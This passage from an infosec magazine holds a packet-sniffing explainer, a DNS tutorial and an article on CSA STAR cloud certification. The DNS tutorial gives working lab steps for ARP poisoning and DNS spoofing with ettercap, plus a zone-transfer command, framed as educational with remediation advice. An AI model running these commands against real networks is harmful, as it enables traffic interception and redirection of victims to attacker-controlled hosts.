The data that is received initially will be in a raw format that only the software can understand. It needs to be converted to a human-readable form for the forensic investigator or network administrator to interpret. The tool performs this operation in a process called conversion. The data can then be analyzed, and the necessary information can be obtained. Thus, the place where the fault is present can be identified, and
necessary actions can be taken. Normally, there are three basic types of packet sniffing: ARP sniffing, IP sniffing and MAC sniffing.
In ARP sniffing, the information is transferred to the ARP cache of the hosts and the network traffic is directed towards the administrator. In IP sniffing, the information corresponding to an IP address filter is captured. MAC sniffing is similar to IP sniffing, except that the device sniffs information packets of a particular MAC address.
COMPONENTS OF PACKET SNIFFER
Before delving into detail on how packet sniffers work, it is important to understand the components that are part of the sniffer. The four major parts of a sniffer are the hardware, the driver, the buffer and the packet analysis. Most packet sniffers work with common adapters, but some require multiple adapters, wireless adapters and others. Before installing the sniffer on the system, check whether the system contains the necessary adapter for the sniffer. The next important component for a sniffer to work is the driver program. Without the driver, the sniffer cannot be installed on the system. Once the sniffer is installed, it requires a buffer, which is the storage area for the data captured from the network.
There are two ways in which data can be stored in the buffer. In the first method, the data is stored in the buffer until the storage space runs out; this prevents new data from being stored, as there is no storage space left. The other method is to replace the old data with new data as and when the buffer overflows. The forensic investigator or network administrator has the option to select the buffer storage method. Also, the size of the buffer depends on the EMS (Expanded Memory Specification) memory of the computer. When the EMS memory of the computer is higher, more data can be stored in the buffer.
The packet analysis is the most essential and core part of the sniffing process, as it captures and analyzes the data from the packets. Many advanced sniffing tools have been introduced of late that allow users to replay the stored contents so that they can be edited and retransmitted based on requirements.
WORKING PRINCIPLE
The working principle of a sniffing tool is very simple. The network interfaces present in a segment will usually have a hardware address, and they can see the data that is transmitted over the physical medium. The hardware address of one network interface is designed to be unique, so it should be different from the address of any other network interface. Hence, a packet that is transmitted over the network will pass through the host machines, but will be ignored by all machines except the one to which the packet is destined. However, in practice, this is not always the case, because hardware addresses can be changed in software and virtualization technologies are frequently used to generate hardware addresses for virtual machines from a set pool.
In IP networks, each network has a subnet mask, a network address and a broadcast address. An IP address consists of two parts, namely the network address and the host address. The subnet mask helps in separating the IP address into the network and host portions, and the host portion can be further broken down into a subnet address and a host address. The network portion of a system's IP address is identified by performing an AND operation with the netmask, which keeps the network bits and sets the host bits to 0. Any network has two special reserved host addresses: all host bits set to 0 for the network address and all host bits set to 1 (e.g. 255) for the broadcast address. Subnetting a network helps in breaking down bigger networks into multiple smaller networks. A network address is an address that identifies a node in a network. Network addresses are unique within a network, and there can be more than one network address within any network. A broadcast address is a special address that is used to transmit messages to multiple recipients. Broadcast addresses help network administrators in verifying successful data transmission over the network. The broadcast address is used by various clients; the most important of them are the dynamic host configuration protocol and the bootstrap protocol, which use the address to transmit server requests.
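As a small illustration of the AND operation described above, here is a minimal Java sketch (with a hypothetical host address and a /24 mask) that derives the network and broadcast addresses:

public class SubnetDemo {
    public static void main(String[] args) {
        int ip   = toInt(192, 168, 1, 77);     // hypothetical host address
        int mask = toInt(255, 255, 255, 0);    // /24 subnet mask

        int network   = ip & mask;             // the AND operation keeps the network bits
        int broadcast = network | ~mask;       // setting all host bits to 1 gives the broadcast address

        System.out.println("Network:   " + toDotted(network));    // 192.168.1.0
        System.out.println("Broadcast: " + toDotted(broadcast));  // 192.168.1.255
    }

    private static int toInt(int a, int b, int c, int d) {
        return (a << 24) | (b << 16) | (c << 8) | d;
    }

    private static String toDotted(int address) {
        return ((address >> 24) & 0xFF) + "." + ((address >> 16) & 0xFF) + "."
                + ((address >> 8) & 0xFF) + "." + (address & 0xFF);
    }
}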
When a network interface card is configured, it will respond to traffic for addresses that exist in the same network, as designated by the subnet mask and network address. This is the environment in which packet sniffing works, and the three basic steps of packet sniffing are collection, conversion and analysis.

COLLECTION

The first step in the packet sniffing technique is the collection of raw data from the packets that travel along the network. The sniffer will switch the required network interface to promiscuous mode, which will enable
data packets from all hosts on the segment to be captured. When this mode is turned off, only the packets that are addressed to the particular interface will be captured. When this mode is turned on, all packets received on the particular interface will be captured. Packets that are received by the NIC are stored in a buffer and then processed.
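As a rough sketch of this collection step, the snippet below opens an interface in promiscuous mode and hands every captured packet to a listener. It assumes the third-party pcap4j Java library (version 1.x), which wraps the same libpcap/WinPcap driver mentioned elsewhere in this article, and it simply picks the first available interface; a real capture tool would let the analyst choose the interface and apply capture filters.

import org.pcap4j.core.PacketListener;
import org.pcap4j.core.PcapHandle;
import org.pcap4j.core.PcapNetworkInterface;
import org.pcap4j.core.PcapNetworkInterface.PromiscuousMode;
import org.pcap4j.core.Pcaps;

public class PromiscuousCapture {
    public static void main(String[] args) throws Exception {
        // Pick the first capture-capable interface on this machine.
        PcapNetworkInterface nif = Pcaps.findAllDevs().get(0);

        // Open it in promiscuous mode: 65536-byte snapshot length, 10 ms read timeout.
        PcapHandle handle = nif.openLive(65536, PromiscuousMode.PROMISCUOUS, 10);

        // Collection: each captured packet is handed to the listener for later conversion and analysis.
        PacketListener listener =
                packet -> System.out.println(packet.length() + " bytes captured");

        handle.loop(10, listener);   // capture ten packets, then stop
        handle.close();
    }
}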
It is important for the forensic investigator or network administrator to understand where to place a packet sniffer for it to capture packets effectively. This is called tapping the wire or getting on the wire, in which the packet sniffer is placed in the correct physical location. Placing the sniffer tool at the right position is as tough as analyzing the packets for information. Since there are hardware devices connecting a network, placing the tool at the wrong position will not fetch packets. As seen before, the network interface card should be in promiscuous mode for capturing the data that is flowing across the network. Usually, operating systems do not allow ordinary users to turn promiscuous mode on; administrator privileges are required to enable this mode, and if that is not possible, packet sniffing cannot be carried out on that particular network. It is much easier to sniff packets in a network that has hubs installed because, when traffic is sent over a hub, it traverses every port that is connected to the hub. Hence, once you connect the packet sniffer to an empty port of the hub, you will receive the packets travelling across the hub.

Figure 4. Example of one location where packet sniffer can be placed. Source: http://www.windowsecurity.com/articlestutorials/misc_network_security/Network_Analyzers_Part1.html.

The most common type of network is a switched network, as it allows broadcast, multicast and unicast traffic. It also supports full duplex communication, in which the host system can send and receive packets simultaneously. This increases the complexity of setting up a packet sniffing tool in a switched environment. Also, only the traffic that is sent to the broadcast address or to the host machine itself can be captured. Hence, the visibility window for the packet sniffer is far lower in a switched environment.
There are three common ways of capturing data in a switched network: port mirroring, ARP cache poisoning and hubbing out. Port mirroring is the simplest of the three ways by which packets can be captured. The forensic investigator or network administrator must be able to access the command line interface of the switch to enable port mirroring. As a forensic investigator or network administrator, all you need to do is enter a command in the command line interface which instructs the switch to copy traffic from one port to another.
Another method of capturing the data in a switched environment is hubbing out, which is a technique in which the target device and the analyzer are localized within a network by connecting them directly to a hub. In the hubbing out method, the forensic investigator or network administrator needs a hub and some network cables to connect the target to the hub. First, unplug the host from the network, then plug the target and the analyzer into the hub. Then, connect the hub to a network switch, which enables the data to be transferred to the hub and simultaneously to the analyzer.

In the seven-layer OSI model, the second layer deals with MAC addresses while the third layer deals with IP addresses, and both of these addresses are used in conjunction for network data transfer. Switches operate at the second layer and hence, IP addresses must be resolved to MAC addresses and vice versa for data transfer. This translation process is handled by the address resolution protocol (ARP). Whenever a computer needs to transfer data to another computer, an ARP request is sent to the switch, which then sends an ARP broadcast packet to the systems that are connected to it. The target computer which has the matching IP address responds to the request by sending out its MAC address. This information is then stored in the ARP cache so that future connections can use this data without sending out a new request. Poisoning this cache makes it possible to capture the traffic across the network, and hence ARP cache poisoning is otherwise called ARP spoofing.

CONVERSION

In this step, the raw data that was captured in the collection step is converted to a human-readable form. Only the converted data can be analyzed for information that is useful to the network administrator. The work of most command line packet sniffers stops at this point, and the remaining work is left to the end user.

ANALYSIS

The third and final step of the packet sniffing technique is analysis, in which the data now in human-readable form is analyzed to gather the required information. Multiple packets are compared to understand the behavior of the network. The GUI-based packet sniffing tools are handy at this stage, as they include comparison tools as well.
All these methods ensure that the right packets are captured as part of the packet sniffing technique. Network problems can be analyzed, and necessary actions can be taken by the network administrators to prevent further problems in the network. The three packet sniffing tools mentioned above are used widely around the globe.
The goal of analyzing data in computer forensics is to identify and explore the digital content in order to preserve and recover the original data that is present. There are various instances where computer forensics has come in handy for network administrators. Live analysis is a very effective technique, as it ensures that encrypted file systems can also be captured and analyzed.
ABOUT THE AUTHOR

Eric A. Vanderburg, MBA, CISSP, Director of Information Systems and Security at JURINNOV, Technology Leader, Author, Expert Witness, and Cyber Investigator.


UNDERSTANDING
DOMAIN NAME SYSTEM
by Amit Kumar Sharma

Domain Name System (DNS): DNS spoofing, also referred to as DNS cache poisoning in the technical world, is an attack wherein junk (customized data) is added into the Domain Name System name server's cache database, which causes it to return incorrect data, thereby diverting the traffic to the attacker's computer.

Let's understand this attack today. For this, we have to have an understanding of DNS first. So what we will do is understand DNS, and then we will see what ARP and DNS spoofing attacks are.

UNDERSTANDING DNS

Any website has an identity, which is usually known as the domain name, but at the backend it is identified by an IP address. For any computer it is the IP address which matters, but who tells the computer what the IP address for a specific website is, or vice versa? It is the DNS. DNS is responsible for the translation of the domain name to an IP address.
If you type an address in the address bar, believe me, a lot of things go on in the background. The DNS server translates the domain name into an IP address, and this process is called DNS resolution.
RFC 1035 describes the DNS protocol, wherein it is recommended that DNS should generally operate over the UDP protocol. UDP is preferred over TCP for most DNS requests because of its low overhead.
You can find more details about DNS under the following RFCs:
IETF RFC 1034: DOMAIN NAMES - CONCEPTS AND FACILITIES
IETF RFC 1912: COMMON DNS OPERATIONAL AND CONFIGURATION ERRORS
IETF RFC 2181: CLARIFICATIONS TO THE DNS SPECIFICATION
IETF RFC 1035: DOMAIN NAMES - IMPLEMENTATION AND SPECIFICATION

PORT 53

Out of all the existing ports, port 53 was the one chosen to run the DNS service. Port 53 supports both TCP and UDP. TCP is given the responsibility for zone transfers of full name record databases, whereas UDP handles individual lookups.

TCP is used for handling zone transfers because of its connection-oriented nature. This nature helps the DNS servers establish a connection between them to transfer the zone data, wherein the source and destination DNS servers are responsible for ensuring consistency, maybe by using the TCP ACK bit or some other logic, which varies.
One thing that we have to keep in mind is that zone transfers are prone to giving away entire network maps.
The UDP used on port 53 is a connectionless communications protocol. It makes the transmission of a datagram message from one computer to an application running on another computer possible on port 53.
UDP also plays an important role when it comes to the performance of DNS resolution. As it is a connectionless protocol, there is no need for it to maintain state or connections, thereby making it more efficient. DNS messages are sent over UDP, and DNS servers bind to UDP port 53. If the message length exceeds the default message size for a UDP datagram (512 octets), the first response to the message is sent with as much data as the UDP datagram will allow, and the DNS server sets a flag indicating a truncated response. It is then the responsibility of the message sender to decide how to send the next message, i.e. over TCP or over UDP again.
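To make the message format concrete, the sketch below builds a minimal DNS query by hand and sends it over UDP to port 53. The queried name and the resolver address are placeholders (any reachable recursive resolver would do), and parsing of the answer is left out:

import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;

public class UdpDnsQuery {
    public static void main(String[] args) throws Exception {
        String name = "example.com";                              // hypothetical name to resolve
        InetAddress resolver = InetAddress.getByName("8.8.8.8");  // placeholder recursive resolver

        ByteBuffer query = ByteBuffer.allocate(512);   // classic UDP DNS message limit
        query.putShort((short) 0x1234);                // transaction ID
        query.putShort((short) 0x0100);                // flags: standard query, recursion desired
        query.putShort((short) 1);                     // QDCOUNT: one question
        query.putShort((short) 0);                     // ANCOUNT
        query.putShort((short) 0);                     // NSCOUNT
        query.putShort((short) 0);                     // ARCOUNT
        for (String label : name.split("\\.")) {       // QNAME as length-prefixed labels
            query.put((byte) label.length());
            query.put(label.getBytes(StandardCharsets.US_ASCII));
        }
        query.put((byte) 0);                           // the empty root label ends the name
        query.putShort((short) 1);                     // QTYPE 1 = A record
        query.putShort((short) 1);                     // QCLASS 1 = IN (Internet)

        DatagramSocket socket = new DatagramSocket();
        socket.setSoTimeout(3000);
        socket.send(new DatagramPacket(query.array(), query.position(), resolver, 53));

        byte[] buffer = new byte[512];
        DatagramPacket answer = new DatagramPacket(buffer, buffer.length);
        socket.receive(answer);
        socket.close();

        System.out.println("The resolver answered with " + answer.getLength() + " bytes");
    }
}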
So if you see port 53 open in your port scanning results: bingo, you may try attacks pertaining to it.
Let's go a little deeper to understand what is meant by DNS resolving.

DNS RESOLVING

The jinx here is that we humans are good at remembering things made of letters, and the reverse is true with our counterparts, the computer systems, which understand numbers better. All computers are identified on the basis of their numbers, and it is really difficult for a human brain to remember so many numbers: the IP addresses of the various servers around the world holding the data that the end user wants to access.
So DNS came to the rescue. It resolves the actual names (domain names), which are fairly simple to remember, into the IP addresses of the servers. DNS can be treated as a huge database which has millions of records, each conveying which IP address belongs to which domain.
A trivial example will look like this:
NAME                TYPE     VALUE
Admin                        127.0.0.1
Site.test.com                192.168.1.3
Site.victim.org              192.168.1.5
Site.example.com.   MX       Mywebsite.com
Mywebsite.com                192.168.1.7
Mail                CNAME    192.168.1.11
ftp                 CNAME    192.168.1.219
ftp                 CNAME    192.168.1.82
www                 CNAME    192.168.1.19

Now let us consider an end user who wants to visit a website called www.searchforme.com. Let us see what steps take place at the backend so that the browser shows the webpage in the blink of an eye. WINK ;)
When we write www.searchforme.com in the address bar of the browser, we usually don't notice that we also have an invisible "." at the end of this address. This powerful "." is called the ROOT. Once we write the address, the web browser or the operating system will first determine whether it already knows this domain by looking in a local file on the computer called the hosts file. This file contains domain names and their associated IP addresses. If the domain is found there, it is resolved directly, but if not, there are other
people who get involved and the search gets messier. All operating systems are configured to ask a resolving name server the same question about the whereabouts of www.searchforme.com, and all resolving name servers are designed to know the location of the ROOT servers.
If we are out of luck and still have not found where our website is, we take that as a NO from the ROOT server, which points us to the TLD (Top Level Domain) name server for the address.
If the TLD name server does not have the answer either, the query moves on to the Authoritative Name Server (ANS). Here is the turning point: how does this server know the address of the queried website?
The answer is the DOMAIN registrar, which keeps a record of all the domains that are purchased, the details of the buyer, and the authenticity of the same. It also records which Authoritative Name Server is to be used for this specific domain. Registrars also notify the organization responsible for the Top Level Domain, called the registry, which in turn updates the TLD name servers for the domain.
The resolving name server takes the response from the TLD name server, stores it in its cache, and finally reaches the Authoritative Name Server, which resolves www.searchforme.com to its corresponding IP address.
Finally, the resolving server passes this answer back to the OS, which in turn directs the browser to reach out to that IP address.
Gosh, so many things go on at a time, so fast!
To increase performance, all these intermediate servers store the request and response pairs in their CACHE, so that when a similar query arrives, the server picks the answer from the cache instead of reaching out to the registry every time.
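If you want to watch this delegation chain yourself, one simple option (assuming the dig utility is available, as it is on most Linux distributions including BackTrack; the domain is just the illustrative one used above) is a traced lookup:

dig +trace www.searchforme.com

The output typically shows the root servers first, then the TLD servers for .com, and finally the authoritative name server that hands back the A record.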

DNS TERMINOLOGIES

The whole of DNS can be treated as a tree structure wherein the ROOT is at the top and subdivided into
DOMAINs, subdomains and zones.

DOMAIN NAME AND ZONES

The domain name space is divided into the following top-level domains, though the list is non-exhaustive:

Com: commercial organizations
Edu: educational organizations
Gov: government organizations
Mil: military organizations
Net: networking organizations
Org: noncommercial organizations
Aero: air-transport industry
Biz: for business purposes
Coop: for cooperatives
Info: for all uses
Museum: for museums
Name: for individuals
Pro: for professions

There are others as well which are based on the country, like .ie for Ireland and .jp for Japan. And believe me, with the growth of the Internet this list keeps expanding and becoming more and more structured.
All these domains are further divided into subdomains and then into zones. Below is a small demonstration of the tree structure.


Figure 1. DNS tree structure*


*: This diagram is for demonstration purposes only.

All the ones in orange are called TLDs (Top Level Domains). These domains in turn have subdomains, which are further classified into different zones.
For instance, the Fully Qualified Domain Name (FQDN) for the domain okies would be Okies.m.test.com, where m is a subdomain of the domain test.
When a DNS query is generated it is usually for the A type record, which directly translates the domain to its IP address.
The table below shows common record types; more parameters can be found at: http://www.iana.org/assignments/dns-parameters.
Type     Value   Description
A        1       IPv4 Address
AAAA     28      IPv6 Address
NS       2       Name Server
AXFR     252     Request for Zone Transfer
MX       15      Mail Exchange
CNAME    5       Canonical Name

Before moving to the evil part we should also look at the AAAA type used for IPv6 addresses. With the advent of IPv6 on the Internet we cannot ignore its concepts and its role in DNS.
AAAA (quad A) records are the IPv6 address records which map a host name to an IPv6 address. (Do not confuse them with the AAA security concept of authentication, authorization and accounting; the name simply reflects that an IPv6 address is four times as long as an IPv4 address.) The AAAA record type stores a 128-bit IPv6 address, and an AAAA query for a specified domain name returns all the associated AAAA records in the response.
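As a quick check (assuming dig or nslookup is available; the domain below is only a placeholder), AAAA records can be requested explicitly:

dig AAAA www.example.com
nslookup -type=AAAA www.example.com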
Let's get down to the evil part now.


THE EVIL (FUN) PART :)

As we have seen, DNS is a crucial part of the Internet and plays a very important role in resolving websites, making the end user experience easy. But this functionality can also be turned around to make all of this a bad experience. There are several vulnerabilities and weaknesses in DNS and its surrounding functionality, so if we do not configure our DNS server properly we can be in BIG trouble. An evil mind can do a lot of tweaks and, believe me, can be very harmful if he or she is able to exploit DNS. Some of the vulnerabilities present with respect to DNS are:

DNS cache poisoning
Denial of service attacks (which apply to nearly everything)
Unauthorized zone transfers (see the example just after this list)
Buffer overflows
Hijacking
DNS misconfiguration
Spoofing the DNS response
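On the zone transfer point, a misconfigured name server may hand its entire zone to anyone who asks for it. As a quick, hedged illustration (the name server and zone below are placeholders; only try this against infrastructure you are authorized to test), a transfer request can be made with dig:

dig axfr @ns1.victim.org victim.org

If the transfer is allowed, the response lists every record in the zone, which is a goldmine for reconnaissance.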

We will discuss cache poisoning and spoofing as a part of this article.

Figure 2. A typical DNS cache in a windows machine
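For reference, the local resolver cache shown in Figure 2 can be listed, and cleared, from a Windows command prompt with the standard commands:

ipconfig /displaydns
ipconfig /flushdns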

DNS SPOOFING
DNS spoofing is said to happen when a DNS server starts accepting and using incorrect information from an illegitimate host. During this attack, malicious data is successfully placed in the cache of the server. The user is then redirected to a wrong website, which can be one hosted by a malicious user, who can hijack the victim without them ever noticing that something wrong has happened.

This spoofing can be done in a number of ways:

DNS cache poisoning
Breaking the platform (really tough)
Spoofing the DNS response

Let's see how we can spoof the DNS through cache poisoning.

DNS CACHE AND POISONING


When we type a URL in the address bar we are actually sending a DNS query. A record of these queries is also stored in a temporary storage location on your computer called the DNS cache. The resolver always checks the cache before querying any of the DNS servers, and if a record is found it uses that instead of querying the server, which makes the lookup faster and decreases network traffic as well.
So our target is this cache. If we succeed in poisoning the cache by exploiting a flaw in the DNS software, and if the server does not correctly validate DNS responses to ensure they are from an authentic source, the server will end up caching the incorrect entries locally and serving them to other users that make the same request (see Figure 2).
Get your hacker hat (of course the white one) and ready your weapon. For me the weapon is my BackTrack machine, which I have named ARCHIE (192.168.1.7).
Ettercap is a very famous tool that we are going to use here. It is also available for Windows. It has various uses, but for this exercise we will use it to spoof DNS.
We are choosing ettercap for two reasons: first, it is awesomely user friendly and easy to use, and second, it ships with a handy dns_spoof plugin.

Figure 3. Attack Perspective

Step 1 - Victim sends a DNS query
Step 2 - Attacker sends a fake DNS reply
Step 3 - Victim unknowingly starts communicating with the attacker
Below is a sample diagram of the attacker and the victim machine.
Our attacker machine: 192.168.1.7
Our victim machine (Windows): 192.168.1.19

Figure 4. Attacker and the Victim Machine

So what we will do is first perform ARP spoofing, then poison the cache, and then access the poisoned cache and verify the results.
A prerequisite you should cross-check:
Check whether IP forwarding is enabled in the file
/proc/sys/net/ipv4/ip_forward

If the value is 0, as it is here, you need to change it to 1 with the command
echo 1 > /proc/sys/net/ipv4/ip_forward
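To confirm the change took effect (a standard Linux check), simply read the value back:

cat /proc/sys/net/ipv4/ip_forward

It should now print 1.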

Next, locate the etter.dns file with the command

locate etter.dns

You can use the Linux vi editor or nano for editing purposes. Now edit the file in its location:

vi /usr/local/share/ettercap/etter.dns

Add the following entry: *.mywebsite.com as the name, A as the type, and 192.168.1.7 as the IP address, which is the address of the attacker's machine (my BackTrack machine in this case). This ensures that any traffic towards *.mywebsite.com will be redirected to my machine. The example line below shows the idea.
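Based on the usual etter.dns format that ships with ettercap (double-check the sample entries in your version, as the exact syntax can vary slightly), the added line would look something like this:

*.mywebsite.com    A    192.168.1.7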


Now consider the victim machine, with IP address 192.168.1.19, running Windows 7 as its operating system. Let us see the result of pinging www.mywebsite.com.
The ping resolves to the IP address 64.120.230.71, which is the expected behavior. See the screenshot below.

Figure 5. Victim machine before the attack

Now let us perform the attack. The command for ettercap is

ettercap -T -q -M arp:remote -P dns_spoof //

This will launch an ARP poisoning attack against the entire network we are connected to, so please be cautious before trying this attack.
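For orientation, the options used above break down roughly as follows (based on ettercap's common command-line options; consult ettercap -h or the man page of your version for the authoritative list):

-T             run in text-only mode
-q             quiet mode, reduce the output
-M arp:remote  man-in-the-middle via ARP poisoning, including traffic to remote networks
-P dns_spoof   load the dns_spoof plugin
//             an empty target specification, which here means all hosts on the network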
Once the attack starts, we go back to our victim machine and ping the website again to see whether the attack is working.


Figure 6. Victim Machine after the attack

Bingo, there it is, the attack was successful. With this we were able to spoof DNS and redirect all the traffic intended for www.mywebsite.com to our IP address. How much damage is done from here depends on the attacker, from popping a Metasploit meterpreter shell to stealing data, etc.
To explore more of the tool you can use the following command:

ettercap -h

The same thing can be done via the ettercap GUI as well, which is very easy to use. Below are the steps. You can either download the GUI version directly from the website or, if you are using BackTrack, the following command comes in handy.


ettercap -G

This will launch the ettercap GUI. Below is the interface:

Figure 7. Ettercap GUI interface

Next you have to select the interface. In this case it is eth0:

Figure 8. Selecting your network interface

Once you have selected OK, the following plugins load and are ready to use.
Next we click on the HOSTS tab and then on Scan HOST.


Figure 9. Host menu item

On scanning, ettercap will find all the hosts that are alive. We can then select from this list of hosts and add entries to the target list; in this case the target IP is 192.168.1.19.
Next we select the MITM menu item and click on ARP poisoning.

Figure 10. Performing ARP poisoning

The window below pops up; click on OK.

Figure 11. ARP poisoning

Once you click on OK, the tool performs the attack by sending the ARP packets.
To launch the DNS spoof attack:


Go to the PLUGIN menu item and scroll down to find the dns_spoof plugin. Double-clicking on it will activate the plugin and start spoofing DNS.

Figure 12. dns_spoof plugin

REMEDIATION

If you understand the basic working of DNS queries, the remediation is right in front of your eyes. These attacks are not effective if the attacker is not able to interfere with the initial query that identifies a domain. To that end, limit access to the computers you rely on or that genuinely need it. Performing end-to-end validation once the connection is established can be used to check the authenticity of the data. One very effective measure is randomization of the source port for DNS requests. Other measures include upgrading your DNS servers to add security with DNSSEC, configuring name servers properly with the security aspect in mind, auditing the servers regularly for security flaws, and applying patches as and when required.
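As an illustration only (not a drop-in configuration; directive names follow common BIND 9 usage and should be adapted to your own DNS server and version), a hardened options block for a name server might restrict recursion and zone transfers and enable DNSSEC validation along these lines:

acl "trusted" { 192.168.1.0/24; localhost; };

options {
    recursion yes;
    allow-recursion { trusted; };   # only answer recursive queries for trusted clients
    allow-transfer { none; };       # no zone transfers unless explicitly allowed per zone
    dnssec-validation auto;         # validate DNSSEC-signed answers
    version "not disclosed";        # hide the version banner from fingerprinting
};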

WORD OF CAUTION

Do not use this attack on a live network. Please set up a small lab environment and perform the attack for educational purposes only, to learn the concepts.
REFERENCES

http://www.dns.net/dnsrd/
http://cr.yp.to/djbdns/notes.html
http://www.sans.org
http://www.google.com

ABOUT THE AUTHOR

Amit Kumar Sharma commonly known as AKS-44 has a B.E in EC and works in Information Security for a reputed firm. He is
passionate about Security and spends his time learning/researching in the wild.


CSA CERTIFICATION OFFERS SIMPLE, COST-EFFECTIVE WAY TO EVALUATE AND COMPARE CLOUD PROVIDERS
by John DiMaria

Technological developments, constricted budgets, and the need for flexible access have led to an increase in business demand for cloud computing. Many organizations are wary of cloud services, however, due to apprehensions around security issues. Ernst & Young conducted a survey of C-level leaders in 52 countries which showed a unified concern over the accelerated rate at which companies are moving information to the cloud and the subsequent demise of physical boundaries and infrastructure.

The widespread adoption of mobile devices only serves to accelerate this trend. Now employees, customers, suppliers, and other stakeholders can access data wherever and whenever they wish, intensifying concerns surrounding security and privacy (Ernst & Young 2011 Global Information Security Survey, Out of the Cloud into the Fog, 2011).
Companies are moving from traditional IT staffing outsourcing contracts to cloud service providers, forever altering their business model and IT functions, with the potential to greatly reduce or even eliminate in-house IT operations. Security and quality must be of the highest concern, focused on the most important assets any company has: customers and stakeholders.
In 2012, BSI, a leading certification body and business improvement solutions provider, teamed up with the Cloud Security Alliance (CSA), an independent not-for-profit coalition comprised of industry leaders, associations, and information security experts. Together they identified serious gaps within the IT ecosystem that inhibit market adoption of secure and reliable cloud services. They found that businesses did not have simple, cost-effective ways to evaluate and compare their providers' resilience, data protection capabilities and service portability.
CSA and BSI recognized that there was no single program, regulation or other compliance regime that would meet the future demands of IT as well as address the risk of adding complexity to the already overloaded and costly
compliance landscape. The rise of the cloud as a global computer utility, however, demands better harmonization of compliance concerns and business needs.
The Ernst & Young survey supported their findings, which revealed that while companies are trying
to respond, they fully admit that the information security budget may not be effectively applied. Just
over half of companies indicated that their security functions do not meet the needs of the organization.
Most admit that they have a heavy reliance on trust when it comes to outsourcing IT services, but what
they need are validation, verification, and certification. The vast majority of companies are ready to mandate a Standard of Care and Due Diligence with almost ninety percent in favor of external certification
and forty-five percent insisting it be based on an agreed upon internationally-accepted standard.
While there was already a self-declaration process available through the CSA Security, Trust and Assurance Registry (STAR), it was evident that without a formal validation and verification process that complies
with international standards, self-declaration would not fill the need for transparency and trust. There were
also questions regarding whether or not the scope of self-declaration was fit-for-purpose as there was no
real measurement of how the processes were to be managed to ensure optimization (maturity).
BSI developed a process that would be user friendly, allow 3rd party validation and verification, and
provide a formal certification that would be internationally accepted.
After many discussions with users, industry experts, and service providers, it was clear that any new
standard would be overkill and just add to the confusion of the plethora of standards already in existence.
A new standard would also have to build credibility over the long term, thus inhibiting adoption.

ISO/IEC 27001 THE FOUNDATION FOR STAR CERTIFICATION

The gold standard since 2005, ISO/IEC 27001 is the most accepted internationally-endorsed standard for
information security in the world. In some countries, like Japan, ISO/IEC 27001 has been mandated by
the government particularly for publicly-traded companies, but over the years has cascaded down through
the supply-chain. Many other countries are jumping on board by requiring tighter controls over information
security across a variety of industries, as well as their critical suppliers and extended business partners.
Companies also realize they must be leaner, asking more of each employee while settling for smaller
budgets. Moving to the cloud is in part a reaction to increased IT costs as it provides more IT services
for a smaller investment. Unfortunately, it comes with increased risk, and companies are looking for a
globally-accepted standard and 3rd party verification that can serve as a screening process for suppliers,
particularly Cloud Service Providers. ISO 27001 has a long history going back to 1995 when BS 7799
was introduced. It was improved over the years taking into consideration the ever-changing compliance
and regulatory landscape for information security.


Originally based on the Plan-Do-Check-Act (PDCA) model, ISO 27001 is consistent with and easily integrated into other management system standards and regulatory requirements. With the release of ISO/IEC 27001:2013, there will be increased consistency across all standards.

ISO 27001 has been called the "umbrella" standard because of its strong management system foundation, which ensures business systems and objectives are in place that drive process ownership and continual improvement.

As stated in Annex A within the standard, ISO/IEC 27001 contains a comprehensive list of control objectives and controls that have been found to be commonly relevant in organizations. Users of this International Standard are directed to Annex A as a starting point for control selection to ensure that no important control options are overlooked. Additional controls may be necessary for cloud service providers,
however. Some controls can be excluded with clear evidential justification and others can be replaced
with compensating controls that meet or exceed the same requirement. In terms of the cloud, controls
like those in the Cloud Control Matrix (CCM) can be added or even substituted, if justified.


Security standards that rely on self-assessment techniques and checklists ultimately fail to engage the
deeper concerns of CIOs and CISOs. ISO/IEC 27001 plus CCM is certifiable by an accredited firm and
has a formal management system to detect ongoing vulnerabilities, create information security controls,
and preempt security threats. It is risk-based, and its assessment helps identify the controls needed to
secure information. For this reason, ISO/IEC 27001 was used as the foundation for STAR Certification,
but it can be used with any other industry-specific standard and/or framework either to supplement it or
for specific needs such as government or healthcare contracts. The CCM can act as additional or compensatory controls to build a unified integrated system rather than reinforcing islands of information.
The CCM is specifically designed to provide fundamental security principles to guide cloud vendors
and to assist prospective cloud customers in assessing the overall security risk of a cloud provider.
This matrix is meant to be integrated into the assessment by the auditor; referencing the applicable
CCM control to the associated ISO 27001 controls (Statement of Applicability). The output will be the result of the overall performance of the organization within the scope of certification.

Figure 1. SOA

To further the value and increase transparency, CSA STAR Certification contains a maturity model to
assess how well managed the activities are in the control areas. The resulting maturity score helps drive
internal improvements within the organization, but will not be listed on certificates.
An organization must demonstrate that it has all the controls in place and operating effectively, however, before an assessment of the management capability around the controls can take place.
When an organization is audited, a Management Capability Score will be assigned to each of the control
areas in the CCM. This will indicate the capability of the management in this area to ensure the control is
operating effectively.


Figure 2. CCM Control Areas

The management capability of the controls will be scored on a scale of 1-15. These scores have been
divided into 5 different categories that describe the type of approach characteristic of each group of scores.

Figure 3. Maturity Rating

In order to make it possible for an assessor to consistently apply a score to the control area, each auditor is provided a grid that outlines what would be required of an organization to achieve each score.
Depending on the capability level the client achieves, the audit report will categorize performance
against the maturity model as:
No Award
A Bronze Award
A Silver Award
A Gold Award
ISO 27001 is a management systems standard and by definition requires a systematic approach to managing an organization. Therefore, if an organization is certified to ISO 27001, it is very unlikely that they
would not achieve at least a bronze award.
STAR Certification leverages a holistic information security management system (ISO/IEC 27001) that, when applied with good risk management discipline, can address all cloud-specific risks and relevant aspects of information security. Its benefits depend on proper scope and implementation; it must be Service Level Agreement (SLA) driven. (An SLA complements and forms part of a service agreement; it is a means of incorporating strategic business objectives and defining the desired business results.)


Clients care about the security of their sensitive information and they care that cloud providers are certified. However, to provide the best level of security and service, how the management system is implemented is equally important: it must be fit-for-purpose. A scope that is not fit-for-purpose means rather little when it comes to cloud services. STAR Certification uniquely examines scope relative to service, ensuring the most meaningful certification and providing evidence of 3rd party approval.

SUMMARY
ISO 27001 requires the organization to evaluate customers' requirements and expectations, as well as contractual requirements. To achieve this, it requires a system to be implemented.
ISO 27001 requires the organization to conduct a risk analysis that identifies the risks to meeting customers' expectations.
The CCM requires the organization to address specific issues that are critical to cloud security.
STAR Certification ensures the proper implementation and effectiveness of the CCM controls and that the scope is fit-for-purpose and SLA driven.
The maturity model assesses and scores how well activities are managed in the control areas, providing a clear route for continual improvement.
IN THE NEXT MODULE WE WILL COVER
Road Map to CSA STAR Certification: optimizing processes, reducing costs and meeting international requirements.
